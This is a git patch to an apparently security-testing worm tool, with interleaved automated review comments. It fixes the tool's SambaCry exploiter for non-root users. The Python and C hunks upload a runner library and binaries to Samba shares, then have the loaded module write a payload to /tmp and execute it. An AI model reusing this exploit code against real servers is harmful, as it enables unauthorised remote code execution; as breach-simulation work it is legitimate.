From 65872d951878010fc3e6cbd8dd8606ed0febf16a Mon Sep 17 00:00:00 2001
From: Itay Mizeretz
Date: Mon, 2 Oct 2017 17:11:51 +0300
Subject: [PATCH] Fix SambaCry not working for non-root user
---
chaos_monkey/config.py | 18 +-------
chaos_monkey/example.conf | 10 +----
chaos_monkey/exploit/sambacry.py | 42 +++++++++++++------
.../sambacry_monkey_runner/build.sh | 8 ++--
.../sambacry_monkey_runner/sc_monkey_runner.c | 17 +++++---
monkey_island/cc/services/config.py | 40 ------------------
6 files changed, 46 insertions(+), 89 deletions(-)
diff --git a/chaos_monkey/config.py b/chaos_monkey/config.py
index 5cbc8f7ba..6b49d3bb3 100644
--- a/chaos_monkey/config.py
+++ b/chaos_monkey/config.py
@@ -111,7 +111,7 @@ class Configuration(object):
# dropper config
###########################
- dropper_try_move_first = sys.argv[0].endswith(".exe")
+ dropper_try_move_first = True
dropper_set_date = True
dropper_date_reference_path_windows = r"%windir%\system32\kernel32.dll"
dropper_date_reference_path_linux = '/bin/sh'
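Review bot: `dropper_try_move_first = True` replaces the `sys.argv[0].endswith(".exe")` condition without saying why, so the attribute now reads as an arbitrary default rather than a deliberate change; a why-comment is warranted, for example `# Always move (rename) the dropper instead of copying it; on Linux the SambaCry runner leaves the monkey under /tmp and the dropper has to relocate it`, adjusted to the real reason, which I am inferring from the runner changes later in this patch. If `sys` was imported into config.py only for that expression, the import is now unused (the import block is outside this hunk). The same default flips to `true` in example.conf in the next hunk of this patch.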
@@ -260,22 +260,6 @@ class Configuration(object):
sambacry_folder_paths_to_guess = ['/', '/mnt', '/tmp', '/storage', '/export', '/share', '/shares', '/home']
# Shares to not check if they're writable.
sambacry_shares_not_to_check = ["IPC$", "print$"]
- # Name of file which contains the monkey's commandline
- sambacry_commandline_filename = "monkey_commandline.txt"
- # Name of file which contains the runner's result
- sambacry_runner_result_filename = "monkey_runner_result"
- # SambaCry runner filename (32 bit)
- sambacry_runner_filename_32 = "sc_monkey_runner32.so"
- # SambaCry runner filename (64 bit)
- sambacry_runner_filename_64 = "sc_monkey_runner64.so"
- # Monkey filename on share (32 bit)
- sambacry_monkey_filename_32 = "monkey32"
- # Monkey filename on share (64 bit)
- sambacry_monkey_filename_64 = "monkey64"
- # Monkey copy filename on share (32 bit)
- sambacry_monkey_copy_filename_32 = "monkey32_2"
- # Monkey copy filename on share (64 bit)
- sambacry_monkey_copy_filename_64 = "monkey64_2"
# system info collection
collect_system_info = True
diff --git a/chaos_monkey/example.conf b/chaos_monkey/example.conf
index 8a979d0fb..285bffd11 100644
--- a/chaos_monkey/example.conf
+++ b/chaos_monkey/example.conf
@@ -27,7 +27,7 @@
"kill_file_path_linux": "/var/run/monkey.not",
"kill_file_path_windows": "%windir%\\monkey.not",
- "dropper_try_move_first": false,
+ "dropper_try_move_first": true,
"exploiter_classes": [
"SSHExploiter",
"SmbExploiter",
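Review bot: Removing the eight `sambacry_*` filename attributes shrinks the set of keys `Configuration` knows about, and nothing in this patch says what happens to a previously saved island configuration that still carries them; if the loader (outside this hunk) only applies known attributes, such configs are now either rejected or silently lose those keys, so a sentence in the commit message or an explicit tolerant-ignore is worth adding. Separately, the context line shows `sambacry_folder_paths_to_guess` starting with `'/'` here while the example.conf hunk later in this patch starts it with `""`; joined with `posixpath.join` in the path-guessing method further down, `""` yields a relative `share/file` path and `'/'` an absolute `/share/file`, so one of the two defaults is presumably wrong and should be reconciled.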
@@ -70,14 +70,6 @@
"sambacry_trigger_timeout": 5,
"sambacry_folder_paths_to_guess": ["", "/mnt", "/tmp", "/storage", "/export", "/share", "/shares", "/home"],
"sambacry_shares_not_to_check": ["IPC$", "print$"],
- "sambacry_commandline_filename": "monkey_commandline.txt",
- "sambacry_runner_result_filename": "monkey_runner_result",
- "sambacry_runner_filename_32": "sc_monkey_runner32.so",
- "sambacry_runner_filename_64": "sc_monkey_runner64.so",
- "sambacry_monkey_filename_32": "monkey32",
- "sambacry_monkey_filename_64": "monkey64",
- "sambacry_monkey_copy_filename_32": "monkey32_2",
- "sambacry_monkey_copy_filename_64": "monkey64_2",
"local_network_scan": false,
"tcp_scan_get_banner": true,
"tcp_scan_interval": 200,
diff --git a/chaos_monkey/exploit/sambacry.py b/chaos_monkey/exploit/sambacry.py
index 1fc0eaf12..4bebbd6a1 100644
--- a/chaos_monkey/exploit/sambacry.py
+++ b/chaos_monkey/exploit/sambacry.py
@@ -33,6 +33,23 @@ class SambaCryExploiter(HostExploiter):
"""
_target_os_type = ['linux']
+ # Name of file which contains the monkey's commandline
+ SAMBACRY_COMMANDLINE_FILENAME = "monkey_commandline.txt"
+ # Name of file which contains the runner's result
+ SAMBACRY_RUNNER_RESULT_FILENAME = "monkey_runner_result"
+ # SambaCry runner filename (32 bit)
+ SAMBACRY_RUNNER_FILENAME_32 = "sc_monkey_runner32.so"
+ # SambaCry runner filename (64 bit)
+ SAMBACRY_RUNNER_FILENAME_64 = "sc_monkey_runner64.so"
+ # Monkey filename on share (32 bit)
+ SAMBACRY_MONKEY_FILENAME_32 = "monkey32"
+ # Monkey filename on share (64 bit)
+ SAMBACRY_MONKEY_FILENAME_64 = "monkey64"
+ # Monkey copy filename on share (32 bit)
+ SAMBACRY_MONKEY_COPY_FILENAME_32 = "monkey32_2"
+ # Monkey copy filename on share (64 bit)
+ SAMBACRY_MONKEY_COPY_FILENAME_64 = "monkey64_2"
+
def __init__(self):
self._config = __import__('config').WormConfiguration
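Review bot: `SAMBACRY_MONKEY_COPY_FILENAME_32` and `SAMBACRY_MONKEY_COPY_FILENAME_64` are added but nothing in this patch reads them: the cleanup list in the next hunk drops the copy names and the C runner no longer creates `monkey32_2`/`monkey64_2` (its `MONKEY_COPY_NAME` constant is deleted), so the two constants and their comments look like dead carry-over and should go. The remaining six values have to stay byte-identical to the literals compiled into sc_monkey_runner.c (`RUNNER_FILENAME`, `MONKEY_NAME`, `RUNNER_RESULT_FILENAME`, `COMMANDLINE_FILENAME`) and to the output names in build.sh, and that coupling is stated nowhere; a comment above the block such as `# NOTE: these names are hard-coded in monkey_utils/sambacry_monkey_runner/sc_monkey_runner.c and build.sh; change them together` would prevent the next silent mismatch. The class body continues past this hunk.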
@@ -97,10 +114,9 @@ class SambaCryExploiter(HostExploiter):
"""
smb_client = self.connect_to_server(ip, creds)
tree_id = smb_client.connectTree(share)
- file_list = [self._config.sambacry_commandline_filename, self._config.sambacry_runner_result_filename,
- self._config.sambacry_runner_filename_32, self._config.sambacry_runner_filename_64,
- self._config.sambacry_monkey_filename_32, self._config.sambacry_monkey_filename_64,
- self._config.sambacry_monkey_copy_filename_32, self._config.sambacry_monkey_copy_filename_64]
+ file_list = [self.SAMBACRY_COMMANDLINE_FILENAME, self.SAMBACRY_RUNNER_RESULT_FILENAME,
+ self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64,
+ self.SAMBACRY_MONKEY_FILENAME_32, self.SAMBACRY_MONKEY_FILENAME_64]
for filename in file_list:
try:
@@ -123,7 +139,7 @@ class SambaCryExploiter(HostExploiter):
tree_id = smb_client.connectTree(share)
file_content = None
try:
- file_id = smb_client.openFile(tree_id, "\\%s" % self._config.sambacry_runner_result_filename,
+ file_id = smb_client.openFile(tree_id, "\\%s" % self.SAMBACRY_RUNNER_RESULT_FILENAME,
desiredAccess=FILE_READ_DATA)
file_content = smb_client.readFile(tree_id, file_id)
smb_client.closeFile(tree_id, file_id)
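Review bot: The cleanup list now covers only what was uploaded to the share, but the runner changed in this same patch writes the monkey to a fixed `/tmp/monkey` on the target and executes it from there, so this routine no longer removes the binary that actually ran; whether something else deletes it (the dropper, given `dropper_try_move_first = True`) is not visible here and should be stated rather than assumed. A comment on `file_list` such as `# Only the artifacts uploaded to the share; the runner's copy under /tmp on the target is not removed here` would make the gap explicit for whoever audits leftover artifacts after a run. The enclosing method starts before this hunk and its loop body continues after it.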
@@ -251,22 +267,22 @@ class SambaCryExploiter(HostExploiter):
with self.get_monkey_commandline_file(host, depth, self._config.dropper_target_path_linux) as monkey_commandline_file:
- smb_client.putFile(share, "\\%s" % self._config.sambacry_commandline_filename, monkey_commandline_file.read)
+ smb_client.putFile(share, "\\%s" % self.SAMBACRY_COMMANDLINE_FILENAME, monkey_commandline_file.read)
with self.get_monkey_runner_bin_file(True) as monkey_runner_bin_file:
- smb_client.putFile(share, "\\%s" % self._config.sambacry_runner_filename_32, monkey_runner_bin_file.read)
+ smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_32, monkey_runner_bin_file.read)
with self.get_monkey_runner_bin_file(False) as monkey_runner_bin_file:
- smb_client.putFile(share, "\\%s" % self._config.sambacry_runner_filename_64, monkey_runner_bin_file.read)
+ smb_client.putFile(share, "\\%s" % self.SAMBACRY_RUNNER_FILENAME_64, monkey_runner_bin_file.read)
monkey_bin_32_src_path = get_target_monkey_by_os(False, True)
monkey_bin_64_src_path = get_target_monkey_by_os(False, False)
with monkeyfs.open(monkey_bin_32_src_path, "rb") as monkey_bin_file:
- smb_client.putFile(share, "\\%s" % self._config.sambacry_monkey_filename_32, monkey_bin_file.read)
+ smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_32, monkey_bin_file.read)
with monkeyfs.open(monkey_bin_64_src_path, "rb") as monkey_bin_file:
- smb_client.putFile(share, "\\%s" % self._config.sambacry_monkey_filename_64, monkey_bin_file.read)
+ smb_client.putFile(share, "\\%s" % self.SAMBACRY_MONKEY_FILENAME_64, monkey_bin_file.read)
smb_client.disconnectTree(tree_id)
@@ -323,14 +339,14 @@ class SambaCryExploiter(HostExploiter):
:return: Array of possible full paths to the module.
"""
sambacry_folder_paths_to_guess = self._config.sambacry_folder_paths_to_guess
- file_names = [self._config.sambacry_runner_filename_32, self._config.sambacry_runner_filename_64]
+ file_names = [self.SAMBACRY_RUNNER_FILENAME_32, self.SAMBACRY_RUNNER_FILENAME_64]
return [posixpath.join(*x) for x in itertools.product(sambacry_folder_paths_to_guess, [share_name], file_names)]
def get_monkey_runner_bin_file(self, is_32bit):
if is_32bit:
- return open(path.join(get_binaries_dir_path(), self._config.sambacry_runner_filename_32), "rb")
+ return open(path.join(get_binaries_dir_path(), self.SAMBACRY_RUNNER_FILENAME_32), "rb")
else:
- return open(path.join(get_binaries_dir_path(), self._config.sambacry_runner_filename_64), "rb")
+ return open(path.join(get_binaries_dir_path(), self.SAMBACRY_RUNNER_FILENAME_64), "rb")
def get_monkey_commandline_file(self, host, depth, location):
return BytesIO(DROPPER_ARG + build_monkey_commandline(host, depth - 1, location))
diff --git a/chaos_monkey/monkey_utils/sambacry_monkey_runner/build.sh b/chaos_monkey/monkey_utils/sambacry_monkey_runner/build.sh
index cc7640742..aba122d76 100644
--- a/chaos_monkey/monkey_utils/sambacry_monkey_runner/build.sh
+++ b/chaos_monkey/monkey_utils/sambacry_monkey_runner/build.sh
@@ -1,9 +1,9 @@
#!/usr/bin/env bash
gcc -c -Wall -Werror -fpic -m64 sc_monkey_runner.c
-gcc -shared -m64 -o sc_monkey_runner_64.so sc_monkey_runner.o
+gcc -shared -m64 -o sc_monkey_runner64.so sc_monkey_runner.o
rm sc_monkey_runner.o
-strip sc_monkey_runner_64.so
+strip sc_monkey_runner64.so
gcc -c -Wall -Werror -fpic -m32 sc_monkey_runner.c
-gcc -shared -m32 -o sc_monkey_runner_32.so sc_monkey_runner.o
+gcc -shared -m32 -o sc_monkey_runner32.so sc_monkey_runner.o
rm sc_monkey_runner.o
-strip sc_monkey_runner_32.so
\ No newline at end of file
+strip sc_monkey_runner32.so
\ No newline at end of file
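Review bot: `get_monkey_runner_bin_file` and `get_monkey_commandline_file` still carry no docstring while the path-guessing method right above them is documented; the first returns an open binary handle that the caller must close (every call site in this patch wraps it in `with`), and that contract deserves stating: `"""Open the SambaCry runner .so for the requested architecture; the caller owns and closes the handle."""`. On style, the if/else pair could collapse to `name = self.SAMBACRY_RUNNER_FILENAME_32 if is_32bit else self.SAMBACRY_RUNNER_FILENAME_64` followed by one `return open(path.join(get_binaries_dir_path(), name), "rb")`, leaving a single place to keep in sync with the constants. The method at the top of the hunk begins outside it.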
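Review bot: Renaming the outputs to `sc_monkey_runner32.so`/`sc_monkey_runner64.so` makes the build match the new constants, but the script still has no error handling, so a failing `gcc -c` is followed by `gcc -shared`, `rm` and `strip` on whatever stale `.so` happens to be on disk and the build appears to succeed with an outdated artifact. Adding `set -euo pipefail` on the line after the shebang makes the first failing step abort the build. The `\ No newline at end of file` on the last line is worth fixing while the file is being touched.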
diff --git a/chaos_monkey/monkey_utils/sambacry_monkey_runner/sc_monkey_runner.c b/chaos_monkey/monkey_utils/sambacry_monkey_runner/sc_monkey_runner.c
index e23d08f3a..65684fbf2 100644
--- a/chaos_monkey/monkey_utils/sambacry_monkey_runner/sc_monkey_runner.c
+++ b/chaos_monkey/monkey_utils/sambacry_monkey_runner/sc_monkey_runner.c
@@ -22,16 +22,16 @@ int samba_init_module(void)
#ifdef ARCH_IS_64
const char RUNNER_FILENAME[] = "sc_monkey_runner64.so";
const char MONKEY_NAME[] = "monkey64";
- const char MONKEY_COPY_NAME[] = "monkey64_2";
#else
const char RUNNER_FILENAME[] = "sc_monkey_runner32.so";
const char MONKEY_NAME[] = "monkey32";
- const char MONKEY_COPY_NAME[] = "monkey32_2";
#endif
const char RUNNER_RESULT_FILENAME[] = "monkey_runner_result";
const char COMMANDLINE_FILENAME[] = "monkey_commandline.txt";
const int ACCESS_MODE = 0777;
- const char RUN_MONKEY_CMD[] = "sudo ./";
+ const char RUN_MONKEY_CMD[] = "./";
+ const char MONKEY_DEST_FOLDER[] = "/tmp";
+ const char MONKEY_DEST_NAME[] = "monkey";
int found = 0;
char modulePathLine[LINE_MAX_LENGTH] = {'\0'};
@@ -102,7 +102,7 @@ int samba_init_module(void)
// Build commandline
strncat(commandline, RUN_MONKEY_CMD, sizeof(RUN_MONKEY_CMD) - 1);
- strncat(commandline, MONKEY_COPY_NAME, sizeof(MONKEY_COPY_NAME) - 1);
+ strncat(commandline, MONKEY_DEST_NAME, sizeof(MONKEY_DEST_NAME) - 1);
strncat(commandline, " ", 1);
fread(commandline + strlen(commandline), 1, LINE_MAX_LENGTH, pFile);
@@ -133,7 +133,12 @@ int samba_init_module(void)
fread(monkeyBinary, 1, monkeySize, pFile);
fclose(pFile);
- pFile = fopen(MONKEY_COPY_NAME, "wb");
+ if (0 != chdir(MONKEY_DEST_FOLDER))
+ {
+ return 0;
+ }
+
+ pFile = fopen(MONKEY_DEST_NAME, "wb");
if (NULL == pFile)
{
free(monkeyBinary);
@@ -144,7 +149,7 @@ int samba_init_module(void)
free(monkeyBinary);
// Change monkey permissions
- if (0 != chmod(MONKEY_COPY_NAME, ACCESS_MODE))
+ if (0 != chmod(MONKEY_DEST_NAME, ACCESS_MODE))
{
return 0;
}
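Review bot: `ACCESS_MODE = 0777` (context) is now applied to a fixed, predictable `/tmp/monkey` built from `MONKEY_DEST_FOLDER` and `MONKEY_DEST_NAME`, which leaves the executable writable by every local user on the target for as long as it exists; the same uid writes and runs it, so `const int ACCESS_MODE = 0700;` is sufficient and removes that exposure. A fixed name in a world-writable directory also means the `fopen(MONKEY_DEST_NAME, "wb")` in the third hunk silently writes through whatever already exists at that path, or fails if another user owns it; creating it with `open(MONKEY_DEST_NAME, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0700)` fails closed instead. Dropping `sudo` from `RUN_MONKEY_CMD` is the actual fix for the non-root case and reads fine. `samba_init_module` begins and ends outside this hunk.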
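Review bot: The new `strncat(commandline, MONKEY_DEST_NAME, sizeof(MONKEY_DEST_NAME) - 1)` keeps the surrounding pattern of bounding by the source length, which never limits `commandline` itself, and the `fread(commandline + strlen(commandline), 1, LINE_MAX_LENGTH, pFile)` two lines below then reads up to `LINE_MAX_LENGTH` bytes starting past the prefix; if `commandline` is declared as `LINE_MAX_LENGTH` bytes (its declaration is outside the hunk), a long command-line file overruns the buffer. Bounding the read by the remaining space, `fread(commandline + strlen(commandline), 1, LINE_MAX_LENGTH - strlen(commandline) - 1, pFile);`, closes that independently of how the buffer is sized; the trailing byte keeps room for the terminator, assuming the buffer is zero-initialised like `modulePathLine` in the first hunk. This is pre-existing, but the commit touches the line right above it.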
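Review bot: The new `chdir` failure branch returns 0 without `free(monkeyBinary)`, while the `fopen` failure branch directly below it does free; `monkeyBinary` was already filled by the `fread` at the top of the hunk, so this path leaks the whole binary buffer — add `free(monkeyBinary);` before that `return 0;`. `chdir(MONKEY_DEST_FOLDER)` also changes the working directory of the process this module is loaded into (presumably the Samba daemon, given the `samba_init_module` entry point) and nothing restores it afterwards; building the absolute destination path into both the `fopen` call and `commandline` would avoid the process-wide side effect, and the `chmod` in the last hunk would then use that same absolute path instead of the relative name.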
diff --git a/monkey_island/cc/services/config.py b/monkey_island/cc/services/config.py
index 0a89e4c4f..5e4d5abe0 100644
--- a/monkey_island/cc/services/config.py
+++ b/monkey_island/cc/services/config.py
@@ -587,46 +587,6 @@ SCHEMA = {
"IPC$", "print$"
],
"description": "These shares won't be checked when exploiting with SambaCry"
- },
- "sambacry_commandline_filename": {
- "title": "SambaCry commandline filename",
- "type": "string",
- "default": "monkey_commandline.txt",
- },
- "sambacry_runner_result_filename": {
- "title": "SambaCry runner result filename",
- "type": "string",
- "default": "monkey_runner_result",
- },
- "sambacry_runner_filename_32": {
- "title": "SambaCry runner filename (32 bit)",
- "type": "string",
- "default": "sc_monkey_runner32.so",
- },
- "sambacry_runner_filename_64": {
- "title": "SambaCry runner filename (64 bit)",
- "type": "string",
- "default": "sc_monkey_runner64.so",
- },
- "sambacry_monkey_filename_32": {
- "title": "SambaCry monkey filename (32 bit)",
- "type": "string",
- "default": "monkey32",
- },
- "sambacry_monkey_filename_64": {
- "title": "SambaCry monkey filename (64 bit)",
- "type": "string",
- "default": "monkey64",
- },
- "sambacry_monkey_copy_filename_32": {
- "title": "SambaCry monkey copy filename (32 bit)",
- "type": "string",
- "default": "monkey32_2",
- },
- "sambacry_monkey_copy_filename_64": {
- "title": "SambaCry monkey copy filename (64 bit)",
- "type": "string",
- "default": "monkey64_2",
}
}
},